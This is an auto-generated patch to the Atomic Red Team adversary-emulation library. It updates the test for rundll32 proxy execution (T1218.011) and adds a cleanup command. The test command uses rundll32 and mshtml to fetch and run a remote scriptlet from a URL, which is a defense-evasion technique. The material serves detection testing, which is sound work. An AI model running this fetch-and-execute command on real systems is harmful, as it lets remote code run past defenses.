From 3a5209a4fc49c847f3b47f2820717cbef98ae403 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 29 Jul 2022 22:32:00 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/index.yaml | 8 ++++++-- atomics/T1218.011/T1218.011.md | 8 ++++++-- 4 files changed, 14 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 4e6c0b83..0f140af2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1,5 +1,5 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt +defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 7160dbb3..9748317b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1,5 +1,5 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt +defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 79a3ad66..a944ce29 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -240,7 +240,7 @@ defense-evasion: identifier: T1218.011 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. @@ -253,7 +253,11 @@ defense-evasion: type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: - command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication + ";document.write();GetObject("script:#{file_url}").Exec(); + + ' + cleanup_command: 'taskkill /IM notepad.exe /f ' name: command_prompt diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 8bc8b5c9..de88a8c0 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe **Supported Platforms:** Windows -**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be +**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d @@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe ```cmd -rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); +start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` +#### Cleanup Commands: +```cmd +taskkill /IM notepad.exe /f +```